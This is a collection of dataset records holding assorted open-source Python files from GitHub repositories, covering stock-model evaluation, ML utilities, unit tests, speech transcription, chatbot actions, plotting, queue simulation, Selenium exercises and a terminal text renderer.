print(f\"saving graph to {options.output}\")\n    savefig(options.output, dpi=options.dpi, orientation='landscape')\nshow()\n","repo_name":"kdh0102/aos-project","sub_path":"blktrace/seekwatcher.py","file_name":"seekwatcher.py","file_ext":"py","file_size_in_byte":30971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"44375297104","text":"#Write a Python program to create a FIFO queue.\nimport queue\nq=queue.Queue()\nfor i in range(17, 22):\n    q.put(i)\nt=1\nwhile not q.empty():\n    print(\"{}-Element out\".format(t))\n    print(q.get())\n    t=t+1\n\n","repo_name":"gambler2020/Python-projects","sub_path":"w3resource/Data_structures/FIFO.py","file_name":"FIFO.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"10360811952","text":"import os\nimport sys\nimport json\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"\"\nfrom evaluate import Evaluate\n\nstart_date = 0\nend_date = 0\nstart_year = 0\nend_year = 0\nnumber_of_data = 0\n\ndef load_csv(num):\n    stock_data = pd.DataFrame(pd.read_csv('./StockData/stock'+num+'.csv'))\n    print(stock_data['date'])\n    print(stock_data['date'][0].split('-',1)[0])\n    print(stock_data.iloc[-1]['date'].split('-',1)[0])\n    global start_year,end_year,start_date,end_date,number_of_data\n    #start_year = stock_data['date'][0].split('-',1)[0]\n    #end_year = stock_data.iloc[-1]['date'].split('-',1)[0]\n    #start_date = stock_data['date'][0]\n    end_date = stock_data.iloc[-1]['date']\n    #start\n    start_date = end_date.replace(end_date.split('-',1)[0],str(int(end_date.split('-',1)[0]) - 9))\n    #print(number_of_data)\nload_csv('0050')\n\n#finput = open(\"ten_year_evaluate.csv\",\"w\")\nfinput = open(\"../public_html/avg_eva.csv\",\"w\")\nfinput.write(\"year\"+\",\")\nfinput.write(\"roi of predict\"+\",\")\nfinput.write(\"roi of ans\"+\",\")\nfinput.write(\"roi of 
baseline,\")\nfinput.write(\"trend_accurancy_rate_train\"+\",\")\nfinput.write(\"trend_accurancy_rate_val\"+\",\")\nfinput.write(\"trend_accurancy_rate_test\"+\"\\n\")\n\nfile=\"build_config.py\"\nstart = \"'date':\"\nend_symbol = \"'end_date':\"\nfin = open(file)\nfout = open('tmp_config.py',\"w\")\nfor line in fin:\n if start in line:\n line = line.replace(line.split(':',1)[1].split(',',1)[0],\"'\"+start_date+\"'\")\n print(line)\n if end_symbol in line:\n line = line.replace(line.split(':',1)[1].split(',',1)[0],\"'\" + end_date + \"'\")\n print(line)\n fout.write(line)\nfin.close()\nfout.close()\n\nfin = open('tmp_config.py')\nfout = open(file,'w')\nfor line in fin:\n fout.write(line)\nfin.close()\nfout.close()\n\nos.system(\"python3 build_train_data.py\")\n#os.system(\"python3 stockModel.py 0050\")\ntrain = np.zeros(5)\ntest = np.zeros(5)\nval = np.zeros(5)\npredict = np.zeros(5)\nans = np.zeros(5)\nbaseline = np.zeros(5)\nstock_symbol = \"0050\"\nfor i in range(5):\n os.system(\"python3 model_start.py 0050\")\n evaluate = Evaluate(stock_symbol)\n predict[i] = evaluate.roi(\"predict\")\n ans[i] = evaluate.roi(\"ans\")\n baseline[i] = evaluate.roi(\"baseline\")\n train[i] = (evaluate.trend_accurancy_rate(\"train\"))\n test[i] = (evaluate.trend_accurancy_rate(\"test\"))\n val[i] = (evaluate.trend_accurancy_rate(\"val\"))\n#os.system(\"python3 ./Model/transformer.py 0050\")\n'''train /= 5\ntest /= 5\nval /= 5\nbaseline /= 5\npredict /= 5\nans /= 5\n'''\n#stock_symbol = \"0050\"\n'''\nevaluate = Evaluate(stock_symbol)\nfinput.write(start_date+\"~\"+end_date+\",\")\nfinput.write(str(np.mean(predict))+\"%/\"+str(np.std(predict, ddof=1))+\"%,\")\nfinput.write(str(np.mean(ans))+\"%/\"+str(np.std(ans, ddof=1))+\"%,\")\nfinput.write(str(np.mean(baseline))+\"%/\"+str(np.std(baseline, ddof=1))+\"%,\")\nfinput.write(str(np.mean(train))+\"%/\"+str(np.std(train, ddof=1))+\"%,\")\nfinput.write(str(np.mean(val))+\"%/\"+str(np.std(val, ddof=1))+\"%,\")\nfinput.write(str(np.mean(test))+\"%/\"+str(np.std(test, ddof=1))+\"%\\n\")\nfinput.write(\"\\n\")\n\n'''\n\nevaluate = Evaluate(stock_symbol)\nfinput.write(start_date+\"~\"+end_date+\",\")\nfinput.write(str(np.mean(predict))+\"%,\")\nfinput.write(str(np.mean(ans))+\"%,\")\nfinput.write(str(np.mean(baseline))+\"%,\")\nfinput.write(str(np.mean(train))+\"%,\")\nfinput.write(str(np.mean(val))+\"%,\")\nfinput.write(str(np.mean(test))+\"%\\n\")\nfinput.write(\",\")\nfinput.write(str(np.std(predict, ddof=1))+\"%,\")\nfinput.write(str(np.std(ans, ddof=1))+\"%,\")\nfinput.write(str(np.std(baseline, ddof=1))+\"%,\")\nfinput.write(str(np.std(train, ddof=1))+\"%,\")\nfinput.write(str(np.std(val, ddof=1))+\"%,\")\nfinput.write(str(np.std(test, ddof=1))+\"%\\n\")\nfinput.write(\"\\n\")\nevaluate.predictplt()\n\nfinput.close()\n","repo_name":"Zxiro/MBI","sub_path":"Evaluate/avg_evaluate.py","file_name":"avg_evaluate.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3873457313","text":"import json\nimport pandas as pd\nfrom pathlib import Path\nfrom itertools import repeat\nfrom collections import OrderedDict\nimport subprocess\nimport collections\n\n\ndef ensure_dir(dirname):\n dirname = Path(dirname)\n if not dirname.is_dir():\n dirname.mkdir(parents=True, exist_ok=False)\n\n\ndef read_json(fname):\n fname = Path(fname)\n with fname.open('rt') as handle:\n return json.load(handle, object_hook=OrderedDict)\n\n\ndef write_json(content, fname):\n fname = 
Path(fname)\n with fname.open('wt') as handle:\n json.dump(content, handle, indent=4, sort_keys=False)\n\n\ndef inf_loop(data_loader):\n ''' wrapper function for endless data loader. '''\n for loader in repeat(data_loader):\n yield from loader\n\n\ndef flatten(d, root_key='', sep='_'):\n items = []\n for k, v in d.items():\n new_key = root_key + sep + k if root_key else k\n try:\n items.extend(flatten(v, new_key, sep=sep).items())\n except:\n items.append((new_key, v))\n return dict(items)\n\n\ndef dict_to_str(d, sep='_'):\n return f\"{sep}\".join(\"{!s}={!r}\".format(key, val)\n for key, val in d.items())\n\n\ndef mod_dict(dict_to_modify, params):\n def recurse_dict(d, k, v):\n if (k in d):\n d[k] = v\n return d\n for kk, vv in d.items():\n if (type(vv) == collections.OrderedDict or type(vv) == dict):\n d[kk] = recurse_dict(vv, k, v)\n return d\n for k, v in params.items():\n if k in dict_to_modify:\n dict_to_modify[k] = v\n continue\n for kk, vv in dict_to_modify.items():\n if (type(vv) == collections.OrderedDict or type(vv) == dict):\n dict_to_modify[kk] = recurse_dict(vv, k, v)\n return dict_to_modify\n\n\nclass MetricTracker:\n def __init__(self, *keys, writer=None):\n self.writer = writer\n self._data = pd.DataFrame(index=keys, columns=['total', 'counts', 'average'])\n self.reset()\n\n def reset(self):\n for col in self._data.columns:\n self._data[col].values[:] = 0\n\n def update(self, key, value, n=1):\n if self.writer is not None:\n self.writer.add_scalar(key, value)\n self._data.total[key] += value * n\n self._data.counts[key] += n\n self._data.average[key] = self._data.total[key] / self._data.counts[key]\n\n def avg(self, key):\n return self._data.average[key]\n\n def result(self):\n return dict(self._data.average)\n\ndef get_gpu_memory_map():\n import torch\n \"\"\"Get the current gpu usage.\n Adopted from https://discuss.pytorch.org/t/access-gpu-memory-usage-in-pytorch/3192/4\n Returns\n -------\n usage: dict\n Keys are device ids as integers.\n Values are memory usage as integers in MB.\n \"\"\"\n result = subprocess.check_output(\n [\n 'nvidia-smi', '--query-gpu=memory.used',\n '--format=csv,nounits,noheader'\n ], encoding='utf-8')\n # Convert lines into a dictionary\n gpu_memory = [int(x) for x in result.strip().split('\\n')]\n gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))\n for idx in range(torch.cuda.device_count()):\n # doesn't distinguish between nvidia-smi idx and torch cuda idxs..\n mem = torch.cuda.get_device_properties(idx).total_memory / 1024.0 ** 2\n gpu_memory_map[idx] /= mem\n return gpu_memory_map\n\ndef import_module(base_name, config_name, config):\n \"\"\"\n dynamic import\n \"\"\"\n return getattr(__import__('{}.{}'.format(base_name, config[config_name]['module_name'])), config[config_name]['type'])\n","repo_name":"sajaddarabi/ContrastiveMixup","sub_path":"utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"95"} +{"seq_id":"7465774775","text":"from exojax.spec.hitrancia import interp_logacia_matrix\nfrom exojax.spec.hitrancia import interp_logacia_vector\nfrom exojax.spec.hitrancia import read_cia\nfrom exojax.test.data import TESTDATA_H2_H2_CIA\nfrom exojax.utils.grids import wavenumber_grid\nimport pkg_resources\nimport numpy as np\nimport pytest\n\ndef test_interp_logacia_matrix():\n nus = 4310.0\n nue = 4390.0\n filename = pkg_resources.resource_filename(\n 'exojax', 'data/testdata/' + TESTDATA_H2_H2_CIA)\n nucia, 
tcia, ac = read_cia(filename, nus, nue)\n Tarr = np.array([1000.0, 2000.0])\n logac = np.log10(ac)\n nu_grid, wav, r = wavenumber_grid(nus,nue,10000,xsmode=\"premodit\")\n logac_cia = interp_logacia_matrix(Tarr, nu_grid, nucia, tcia, logac)\n assert np.all(np.shape(logac_cia) == (2,10000))\n assert np.sum(logac_cia) == pytest.approx(-891133.44)\n\ndef test_interp_logacia_vector():\n nus = 4310.0\n nue = 4390.0\n filename = pkg_resources.resource_filename(\n 'exojax', 'data/testdata/' + TESTDATA_H2_H2_CIA)\n nucia, tcia, ac = read_cia(filename, nus, nue)\n T=2000.0\n logac = np.log10(ac)\n nu_grid, wav, r = wavenumber_grid(nus,nue,10000,xsmode=\"premodit\")\n logac_cia = interp_logacia_vector(T, nu_grid, nucia, tcia, logac)\n assert np.all(np.shape(logac_cia) == (10000,))\n assert np.sum(logac_cia) == pytest.approx(-445566.72)\n\nif __name__ == \"__main__\":\n test_interp_logacia_matrix()\n test_interp_logacia_vector()","repo_name":"HajimeKawahara/exojax","sub_path":"tests/unittests/spec/cia/hitrancia_test.py","file_name":"hitrancia_test.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"} +{"seq_id":"27153537685","text":"import subprocess\nimport multiprocessing\n\ndef scan(i):\n subprocess.call([\"/home/jack/projects/sundar/scan_network.sh\", str(i), str(i)])\n\nif __name__ == \"__main__\":\n for i in range(0, 256):\n p = multiprocessing.Process(target=scan, args=[i,])\n p.start()\n\n\n","repo_name":"jackkolb/sundar","sub_path":"scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"69962620152","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_metrics(metrics, titles, x_labels_list, y_labels_list, ncols=3):\n nrows = int(np.ceil(len(metrics) / ncols))\n fig, axes = plt.subplots(nrows=nrows, ncols=ncols, figsize=(5 * ncols, 5 * nrows))\n\n for idx, (ax, metric, title, x_labels, y_labels) in enumerate(zip(axes.flat, metrics, titles, x_labels_list, y_labels_list)):\n heatmap = ax.imshow(metric, cmap='viridis')\n cbar = fig.colorbar(heatmap, ax=ax)\n\n ax.set_xticks(np.arange(metric.shape[1]))\n ax.set_yticks(np.arange(metric.shape[0]))\n ax.set_xticklabels(x_labels)\n ax.set_yticklabels(y_labels)\n\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n for i in range(metric.shape[0]):\n for j in range(metric.shape[1]):\n ax.text(j, i, metric[i, j], ha=\"center\", va=\"center\", color=\"w\")\n\n ax.set_title(title)\n\n # Remove empty subplots\n for idx in range(len(metrics), nrows * ncols):\n fig.delaxes(axes.flat[idx])\n\n plt.tight_layout()\n plt.show()\n\n# Example usage\nmetric1 = np.array([[1667., 0., 0. , 0. , 0.],\n [ 455., 1670., 0. , 0., 0.],\n [ 417., 412., 1384., 0., 0.],\n [ 324., 310., 339., 1112., 0.],\n [ 187., 169., 199., 160., 526.]])\n\nmetric2 = np.array([[586., 0., 0., 0., 0.],\n [117., 358., 0, 0., 0.],\n [ 88., 71., 388., 0., 0.],\n [160., 122., 105., 692., 0.],\n [145., 118., 123., 153., 540.]])\nmetric3 = np.array([[453. , 0. , 0. 
, 0.],\n [148., 569., 0., 0.],\n [106., 124., 609., 0.],\n [ 94., 104., 118., 444.]])\n\nx_labels1 = ['Macro', 'Mega', 'Micro', 'Nano', 'No Influencer']\ny_labels1 = ['Macro', 'Mega', 'Micro', 'Nano', 'No Influencer']\n\nx_labels2 =['Gaming', 'Other', 'Price Update', 'Technical Information', 'Trading Matters']\ny_labels2 = ['Gaming', 'Other', 'Price Update', 'Technical Information', 'Trading Matters']\n\nx_labels3 = ['Advertising', 'Announcement', 'Financial Information', 'Subjective Opinion']\ny_labels3 = ['Advertising', 'Announcement', 'Financial Information', 'Subjective Opinion']\n\nplot_metrics([metric1, metric2, metric3], ['Subtask 1', 'Subtask 2', 'Subtask 3'], [x_labels1, x_labels2, x_labels3], [y_labels1, y_labels2, y_labels3])\n","repo_name":"HamedBabaei/author-profiling-pan2023","sub_path":"visualization/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"71488847034","text":"from rasa_core_sdk import Action\nimport requests\nimport os\nfrom urllib3.exceptions import NewConnectionError\nfrom requests.exceptions import HTTPError\nimport telegram\n\nACCESS_TOKEN = os.environ.get(\"ACCESS_TOKEN\", \"\")\nGITLAB_SERVICE_URL = os.getenv(\"GITLAB_SERVICE_URL\", \"\")\nSECS = 10.0\n\n\nclass RerunPipeline(Action):\n def name(self):\n return \"action_rerun_pipeline\"\n\n def run(self, dispatcher, tracker, domain):\n headers = {'Content-Type': 'application/json'}\n tracker_state = tracker.current_state()\n chat_id = tracker_state[\"sender_id\"]\n if self.check_user(chat_id, headers):\n try:\n message = tracker.latest_message.get(\"text\")\n splitted_message = message.split()\n pipeline_id = splitted_message[-1]\n try:\n response = requests.get(GITLAB_SERVICE_URL +\n \"rerun_pipeline/{chat_id}/\"\n \"{pipeline_id}\"\n .format(chat_id=chat_id,\n pipeline_id=pipeline_id),\n timeout=SECS,\n headers=headers)\n except requests.exceptions.Timeout:\n text = \"Desculpa, não consegui fazer o que você\"\\\n \" me pediu! 😕\"\n bot = telegram.Bot(token=ACCESS_TOKEN)\n bot = bot.send_message(chat_id=chat_id, text=text)\n else:\n response.raise_for_status()\n dispatcher.utter_message(\"Tudo certo, reiniciei sua\"\n \" pipeline!\")\n except HTTPError:\n dispatcher.utter_message(\n \"Ai que pena... não consegui reiniciar a pipeline que você\"\n \" me pediu 😔\")\n dispatcher.utter_message(\n \"Tenta clicar novamente ai nesse botão. 
Se não der certo,\"\n \" sugiro entrar no GitLab e tenta reiniciar você mesmo...\")\n except ValueError:\n dispatcher.utter_message(\n \"Estou com problemas para encontrar seus dados agora,\"\n \" me mande novamente uma mensagem mais tarde.\")\n except NewConnectionError:\n dispatcher.utter_message(\n \"Estou com problemas para me conectar agora, me mande \"\n \"novamente uma mensagem mais tarde.\")\n else:\n dispatcher.utter_message(\"Para rodar novamente um pipeline\"\n \" é necessário que você tenha um \"\n \"repositório do gitlab cadastrado!\")\n dispatcher.utter_message(\"Quando quiser cadastrar é só avisar!\")\n return []\n\n def check_user(self, chat_id, headers):\n url = GITLAB_SERVICE_URL + \"user/infos/{chat_id}\".\\\n format(chat_id=chat_id)\n response = requests.get(url, headers=headers)\n data = response.json()\n if data[\"username\"] and data[\"repository\"]:\n return True\n return False\n","repo_name":"fga-eps-mds/2019.1-ADA","sub_path":"ada/actions/rerun_pipeline.py","file_name":"rerun_pipeline.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"pt","doc_type":"code","stars":11,"dataset":"github-code","pt":"95"} +{"seq_id":"23940830411","text":"from django.urls import reverse\n\nfrom tests import factories as f\n\nfrom taiga.base.utils import json\n\nimport pytest\npytestmark = pytest.mark.django_db\n\n\n@pytest.fixture\ndef user():\n return f.UserFactory.create()\n\n\ndef test_create_feedback(client, user):\n url = reverse(\"feedback-list\")\n\n feedback_data = {\"comment\": \"One feedback comment\"}\n feedback_data = json.dumps(feedback_data)\n\n client.login(user)\n\n response = client.post(url, feedback_data, content_type=\"application/json\")\n assert response.status_code == 200\n\n assert response.data.get(\"id\", None)\n assert response.data.get(\"created_date\", None)\n assert response.data.get(\"full_name\", user.full_name)\n assert response.data.get(\"email\", user.email)\n\n client.logout()\n\n\ndef test_create_feedback_without_comments(client, user):\n url = reverse(\"feedback-list\")\n\n feedback_data = json.dumps({})\n\n client.login(user)\n\n response = client.post(url, feedback_data, content_type=\"application/json\")\n assert response.status_code == 400\n assert response.data.get(\"comment\", None)\n\n client.logout()\n","repo_name":"imfht/djangoapps","sub_path":"taiga-back-master/tests/integration/test_feedback.py","file_name":"test_feedback.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"2798234641","text":"from deepgram import Deepgram\nimport asyncio\nfrom dotenv import dotenv_values\nimport pyaudio\nimport time\nimport json\nimport base64\nimport numpy as np\n\n# Setting up the Deepgram API Key\naccess_code = dotenv_values(\".env\")\nprint(access_code['DEEPGRAM_ACCESS_CODE'])\n\n# Set the audio parameters\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 16000\nCHUNK = 3200\n\ncurrent_timestamp = time.time()\ntarget_timestamp = current_timestamp + 10\ndeepgram = Deepgram(access_code['DEEPGRAM_ACCESS_CODE'])\n\n# Create the PyAudio audio stream\naudio_stream = pyaudio.PyAudio().open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK\n)\n\n# WebSocket connection function\nasync def connect_and_stream_audio():\n try:\n deepgramLive = await deepgram.transcription.live({'punctuate': True, 'interim_results': False, 'language': 'en-US', 'encoding': 'linear16'})\n except Exception as e:\n 
print(f'Could not open socket: {e}')\n return\n\n deepgramLive.registerHandler(deepgramLive.event.CLOSE, lambda c: print(f'Connection closed with code {c}.'))\n # Listen for any transcripts received from Deepgram and write them to the console\n deepgramLive.registerHandler(deepgramLive.event.TRANSCRIPT_RECEIVED, print)\n print('WebSocket connection established')\n\n try:\n while True:\n await asyncio.sleep(0.1)\n audio_data = audio_stream.read(CHUNK)\n audio_data_linear16 = (np.frombuffer(audio_data, dtype=np.int16) * 32767).astype(np.int16)\n audio_data_linear16 = base64.b64encode(audio_data_linear16)\n # print(audio_data_linear16)\n deepgramLive.send(audio_data_linear16)\n\n # deepgramLive.send(json.dumps({'type': 'KeepAlive'}))\n\n except KeyboardInterrupt:\n pass\n\n # await deepgramLive.finish()\n audio_stream.stop_stream()\n audio_stream.close()\n print(time.time() - current_timestamp)\n\n# Run the WebSocket connection and audio streaming\nasyncio.run(connect_and_stream_audio())\n","repo_name":"SaarthShah/Deepgram","sub_path":"real_time_transcriber3.py","file_name":"real_time_transcriber3.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72165917114","text":"from enum import Enum\nfrom Utils import muda_base_de_numero\n\nclass TiposEvento(Enum):\n CHEGADA = 0\n SAIDA = 1\n\nclass Escalonador:\n\n eventos = []\n tempoGlobal = 0.0\n\n def __init__(self, geradorDeAleatorios, listaDeFilas):\n self.geradorDeAleatorios = geradorDeAleatorios\n self.__inicializar_eventos_com_primeiras_chegadas(listaDeFilas)\n \n def __inicializar_eventos_com_primeiras_chegadas(self, listaDeFilas):\n for fila in listaDeFilas:\n if fila.chegadaPrimeiro > -1:\n self.__agendar_evento(TiposEvento.CHEGADA, fila.chegadaPrimeiro, fila)\n \n def inicializar_simulacao(self):\n while(self.geradorDeAleatorios.ha_numero_para_gerar()):\n evento = self.__pop_proximo_evento()\n self.tempoGlobal = evento[\"tempo\"]\n\n if evento[\"tipo\"] == TiposEvento.CHEGADA:\n self.__gerencia_chegada(evento)\n else:\n self.__gerencia_saida(evento)\n\n def __agenda_saida(self, fila):\n if fila.tem_espaco():\n fila.adicionar_na_fila(self.tempoGlobal)\n\n # Se tem um servidor livre ja atende a requisicao\n if fila.get_quantidade_na_fila() <= fila.nServidores:\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n horarioDaSaida = self.__calcular_tempo_proximo_evento(fila.intervalorAtendimento, numeroAleatorio)\n self.__agendar_evento(TiposEvento.SAIDA, horarioDaSaida, fila)\n\n def __gerencia_chegada(self, evento):\n fila = evento[\"fila\"]\n self.__agenda_saida(fila)\n \n # Agenda a proxima chegada, se nao nao faz nada e termina a execucao\n if self.geradorDeAleatorios.ha_numero_para_gerar():\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n horarioDaChegada = self.__calcular_tempo_proximo_evento(fila.intervaloChegada, numeroAleatorio)\n self.__agendar_evento(TiposEvento.CHEGADA, horarioDaChegada, fila)\n\n def __gerencia_saida(self, evento):\n fila = evento[\"fila\"]\n fila.remover_da_fila(self.tempoGlobal)\n\n # Se tem servidor livre na fila atual, agenda a proxima saida\n if fila.get_quantidade_na_fila() >= fila.nServidores:\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n horarioDaSaida = self.__calcular_tempo_proximo_evento(fila.intervalorAtendimento, numeroAleatorio)\n self.__agendar_evento(TiposEvento.SAIDA, horarioDaSaida, fila)\n\n # Se 
existe uma fila em tandem, adiciona na proxima\n if self.geradorDeAleatorios.ha_numero_para_gerar():\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n filaDeSaida = fila.get_saida_da_fila(numeroAleatorio)\n if filaDeSaida is not None:\n self.__agenda_saida(filaDeSaida)\n \n def __pop_proximo_evento(self):\n indexMaisProximo = 0\n diferencaMaisProximo = self.eventos[indexMaisProximo][\"tempo\"] - self.tempoGlobal\n \n for i in range(1, len(self.eventos)):\n evento = self.eventos[i]\n diferencaEventoI = evento[\"tempo\"] - self.tempoGlobal\n if diferencaEventoI < diferencaMaisProximo:\n indexMaisProximo = i\n diferencaMaisProximo = diferencaEventoI\n \n proximoEvento = self.eventos[indexMaisProximo]\n del self.eventos[indexMaisProximo]\n\n return proximoEvento\n\n def __calcular_tempo_proximo_evento(self, intervalo, numeroRandomico):\n return self.tempoGlobal + muda_base_de_numero(intervalo[0], intervalo[1], numeroRandomico)\n\n\n def __agendar_evento(self, tipoEvento, tempoDoEvento, fila):\n self.eventos.append(\n {\n \"tipo\" : tipoEvento,\n \"tempo\" : tempoDoEvento,\n \"fila\" : fila\n }\n )","repo_name":"brunohlippert/SimuladorDeFilas","sub_path":"Escalonador.py","file_name":"Escalonador.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19258161802","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch, helpers\n\ncolumns = ['date', 'total_cases', 'new_cases',\n 'total_deaths', 'new_deaths',\n 'new_tests', 'total_tests',\n 'total_vaccinations', 'new_vaccinations',\n 'cardiovasc_death_rate', 'diabetes_prevalence']\n\nesclient = Elasticsearch(['localhost:9200'], timeout=30)\n\ndf = pd.read_csv('data/owid-covid-data.csv')\ndf = df[df['iso_code'] == 'USA']\ndf = df[columns]\ndf.replace(np.nan, 0, inplace=True)\ndf.dropna(inplace=True)\n\nactions = []\nfor idx in df.index:\n d = dict(df.loc[idx])\n d['date'] = datetime.strptime(d['date'], '%Y-%m-%d')\n actions.append({\n \"_op_type\": \"index\",\n \"_index\": \"covid\",\n \"_source\": d\n })\n\nfor ok, response in helpers.streaming_bulk(client=esclient, actions=actions, index='covid',\n max_retries=5, raise_on_error=False, raise_on_exception=False):\n if not ok:\n print(response)\n","repo_name":"vivianzzhu91/dsci551_project","sub_path":"api/covid2elastic.py","file_name":"covid2elastic.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36294703886","text":"#!/usr/bin/env python3\n\"\"\"Project Euler #22 - Names scores (24/11/2020)\"\"\"\n\ndef get_input():\n with open(\"resources/p022_names.txt\", \"r\") as file:\n return file.read().replace('\"', '').split(',')\n\ndef solve(names):\n names.sort()\n\n total_score = 0\n for i, name in enumerate(names):\n total_score += (i + 1) * sum(ord(letter) - ord('A') + 1 for letter in name)\n\n return total_score\n\nif __name__ == \"__main__\":\n print(solve(get_input()))\n","repo_name":"histefanhere/euler","sub_path":"problems/p022.py","file_name":"p022.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6225464195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 03 11:48:29 2018\n\n\"\"\"\n\nfrom PIL import Image\n\nimport os\n\n# Open a file\n# change path name according to your source 
path\n# The directory should contain a bunch of images that you want to test\npath = \"C:/Users/Kartik/Desktop/Green\" \ndirs = os.listdir( path )\n#list1 = []\n# Check every JPEG image in the directory\nfor file in dirs:\n    if file.endswith(\".jpg\"):\n        # Join the file name with the directory so the image opens regardless of the current working directory\n        img = Image.open(os.path.join(path, file))\n        print(file)\n        pixels = img.getdata()\n        count = 0\n        total = 0\n        for r,g,b in pixels:\n            total += 1\n            if r <= 255 and r > 190 and g <= 255 and g > 190 and b>0 and b<204:\n                count += 1\n        perc = round(count/total*100,2)\n        print(str(perc)+\"%\")\n","repo_name":"kgupta31/Pest-Kill-system--Tuta-Absoluta","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
{"seq_id":"40727573584","text":"import math\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\n\ntry:\n    link = \"http://suninjuly.github.io/explicit_wait2.html\"\n    browser = webdriver.Chrome()\n    browser.get(link)\n\n    price = WebDriverWait(browser, 12).until(\n        ec.text_to_be_present_in_element((By.CSS_SELECTOR, \"h5#price\"), \"$100\")\n    )\n\n    book = browser.find_element(By.CSS_SELECTOR, \"button#book\")\n    book.click()\n\n    number = browser.find_element(By.CSS_SELECTOR, \"span#input_value\")\n    number_value = int(number.text)\n\n    result = math.log(abs(12*math.sin(number_value)))\n\n    input_answer = browser.find_element(By.CSS_SELECTOR, \"input#answer\")\n    input_answer.send_keys(result)\n\n    submit = browser.find_element(By.CSS_SELECTOR, \"button[type='submit']\")\n    submit.click()\nfinally:\n    # wait so the outcome of the script run can be checked visually\n    time.sleep(10)\n    # close the browser after all the steps\n    browser.quit()\n","repo_name":"rzakhar/selenium_course","sub_path":"part2/lesson4_step8.py","file_name":"lesson4_step8.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
{"seq_id":"18961543628","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module implements a renderer that renders another renderer but rotated.\n\"\"\"\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom builtins import range\n\nfrom asciimatics.renderers.base import StaticRenderer\n\n\nclass RotatedDuplicate(StaticRenderer):\n    \"\"\"\n    Chained renderer to add a rotated version of the original renderer underneath and centre the\n    whole thing within the specified dimensions.\n    \"\"\"\n\n    def __init__(self, width, height, renderer):\n        \"\"\"\n        :param width: The maximum width of the rendered text.\n        :param height: The maximum height of the rendered text.\n        :param renderer: The renderer to wrap.\n        \"\"\"\n        super(RotatedDuplicate, self).__init__()\n        for image in renderer.images:\n            mx = (width - max([len(x) for x in image])) // 2\n            my = height // 2 - len(image)\n            tab = (\" \" * mx if mx > 0 else \"\") + \"\\n\" + (\" \" * mx if mx > 0 else \"\")\n            new_image = []\n            new_image.extend([\"\" for _ in range(max(0, my))])\n            new_image.extend(image)\n            new_image.extend([x[::-1] for x in reversed(image)])\n            new_image.extend([\"\" for _ in range(max(0, my))])\n            if mx < 0:\n                new_image = [x[-mx:mx] for x in new_image]\n            if my < 0:\n                new_image = new_image[-my:my]\n            self._images.append(tab.join(new_image))\n","repo_name":"peterbrittain/asciimatics","sub_path":"asciimatics/renderers/rotatedduplicate.py","file_name":"rotatedduplicate.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":3428,"dataset":"github-code","pt":"95"}
